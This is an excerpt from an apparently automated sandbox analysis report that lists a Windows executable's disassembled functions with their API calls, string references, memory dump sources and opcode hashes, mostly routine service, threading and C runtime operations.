                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2429184316
                                                                                                                                                                                                                                                                    • Opcode ID: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction ID: 925ded1f5c256d2d7ca2cb9baee336687e69f41301eaf6f7f9b06fcd4507b0e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E310270740602ABD708CF15CD95B5ABBA8FF45715F10023AE609A7AD0DB7DF9508B9C
                                                                                                                                                                                                                                                                    Function 0040BB70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0040BC81
                                                                                                                                                                                                                                                                      • Part of subcall function 0046B5AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004C94C0,?,?,00468759,?,004C13D0,?), ref: 0046B60E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionInitRaisestd::locale::_
                                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2020603122-1866435925
                                                                                                                                                                                                                                                                    • Opcode ID: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction ID: 1c84d52ffb255289c8c822d3fe868fb1937b2b01e66fc20b4b360ecd81d27cfb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 923104B1900704BBD310DF55C806B96B7A4FB00718F10422FE8049BAC1E7BEB5548BDA
                                                                                                                                                                                                                                                                    Function 00401770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Setting Service Status state to %d , xrefs: 00401800
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d , xrefs: 0040187E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastServiceStatus
                                                                                                                                                                                                                                                                    • String ID: ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d $ReportSvcStatus : Setting Service Status state to %d
                                                                                                                                                                                                                                                                    • API String ID: 1547514316-586121575
                                                                                                                                                                                                                                                                    • Opcode ID: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction ID: 2a8e6345c1da827573bafa61699fe2058e0613da09c450c42f65518c3299f71e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3431C1B1A40215AFE700DF5ADC85F5A7BA8EB04724F14417FF904A7391EF74AA008BA9
                                                                                                                                                                                                                                                                    Function 0270E5EA Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                    • Opcode ID: 23bf213e71c50ce3c7588569dbc33dff54ee26234ddd5d9921d5ac294631473a
                                                                                                                                                                                                                                                                    • Instruction ID: 44a2ebec639f902f4d08d3f80e2f08edf3ddd2dbc43506e9cbc25a2e311d9561
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23bf213e71c50ce3c7588569dbc33dff54ee26234ddd5d9921d5ac294631473a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F051E072601306EFDB2A8F94E8C4B6AB7E5EF44314F14492DE905572E2E771F889CB90
                                                                                                                                                                                                                                                                    Function 00414530 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004145A9
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0041461B
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0041463D
                                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00414660
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$LockitLockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2694047013-0
                                                                                                                                                                                                                                                                    • Opcode ID: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction ID: cab6b8252c7ea6f46c49d82a6c8e4df40f83147f90a4d45c9da3e1dc65de2ae0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6201b34415790ecdc3c4312f4d7271bec7e3576b96991d2cb71848aa7408f576
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A41DD728001499FCB10DF59C880AAEB7B5FB94324F24426ED905633A0EB38AD41CB9A
                                                                                                                                                                                                                                                                    Function 00404306 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                      • Part of subcall function 0041FA30: CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004044EC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in DestroyEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2079671238-3942007460
                                                                                                                                                                                                                                                                    • Opcode ID: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction ID: aac3e4b64ef8bd33976eafc0c19c8d66d4ba662bde6bb840a130360140da2fc7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e7abf2cf1a66fdbb446cba8b09f4a72dc1d6461a6f6d23e6cde9c9ed48dca8b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87212670B843109BCB20DF148C4675A3B58AF51B11F1404BFE9466B2C1DEBCA905C7AE
                                                                                                                                                                                                                                                                    Function 00404050 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,00000008,?,?,004059AA), ref: 0040405B
                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00497733,?,?,004059AA), ref: 00404065
                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000,?,?,004059AA), ref: 004040F5
                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,004059AA,?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 00404103
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalDeleteSection$InitializeUninitialize
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161803370-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction ID: 8dbd2ad74c855c1e3886fba8a0bf51dabcff8673f71024995de98868baa7c6da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1374b990ee36924d85f733176f9cff0057eba2b114e7e0308ad5df1b95475ba0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11B2B16001416BD704EBA6DC49B59B7A8FF90319F10013AF309C7A90DBB9F964C7AA
                                                                                                                                                                                                                                                                    Function 0270DE91 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0270DEAD
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0270DEC6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000003.2675735037.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_3_26e0000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4ee3819c82200233a02d2690cbc952527884f9f81e5f8f058464aa55a89b9ba0
                                                                                                                                                                                                                                                                    • Instruction ID: c4de3f3de4c9917dacb5574c4fa2b2f57b74ac922a3e1d74d3eeae569bd84040
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ee3819c82200233a02d2690cbc952527884f9f81e5f8f058464aa55a89b9ba0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4019732648322EEA73632F47CC966A3BE5EF02274B204739E524800D0EF601C1E9B80
                                                                                                                                                                                                                                                                    Function 0046A3FC Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0046A40E
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0046A41D
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0046A426
                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0046A433
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction ID: e4e9c80c65a6a08ef3cfff89654f3def58ef4d81fe7765c738179de465d37d3f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F05F71C10209EBCB04DBB5DA49A9EBBF8EF28305F5148A69412E7150E774AB049F55
                                                                                                                                                                                                                                                                    Function 0041FE90 Relevance: 5.4, APIs: 4, Instructions: 417COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 0041FF5B
                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0041FF65
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction ID: bd9ddbb0fe4a3e6c369a6c316b03fe687d8d5a0e13e3211eb2381caa863402dd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d4374fadd7b43dced5683e9704e2794f3d6c2d318b486cb43d93fc2591642e0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAF19B72A00218AFCF00DF98D880AAEBBF5FF48310F54456AF945A7352D735AD45CBA9
                                                                                                                                                                                                                                                                    Function 0046A7CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 00402175
                                                                                                                                                                                                                                                                      • Part of subcall function 00402170: GetLastError.KERNEL32(?,00000000,00000000,?,0040320B,?,?,?,?,\\.\pipe\,00000009,?,?), ref: 0040217F
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040120A), ref: 0046A7FE
                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040120A), ref: 0046A80D
                                                                                                                                                                                                                                                                    Strings
